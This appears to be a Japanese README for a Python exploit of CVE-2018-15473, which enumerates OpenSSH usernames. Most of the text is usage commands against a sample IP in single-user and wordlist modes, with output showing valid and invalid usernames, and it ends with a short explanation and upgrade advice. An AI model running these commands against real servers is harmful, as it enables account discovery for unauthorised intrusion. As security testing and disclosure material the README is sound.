
CVE-2018-15473のPythonベースのエクスプロイト。認証応答オラクルを介してOpenSSHのユーザー名列挙を可能にし、単一ユーザーモードとワードリストモードを備えています。
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Original exploit の編集版: https://www.exploit-db.com/exploits/45233
Python3 に変換済み
ユーザー名ワードリストオプションを追加
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
システムは、有効な認証試行と無効な認証試行に対して異なる応答を返します。リモートユーザーは、特別に細工されたリクエストを送信して、ターゲットシステム上の有効なユーザー名を特定できます。これにより、リモートユーザーはターゲットシステム上の有効なユーザー名を判別できます。
OpenSSH サーバーをバージョン 7.7 以上にアップグレードする必要があります。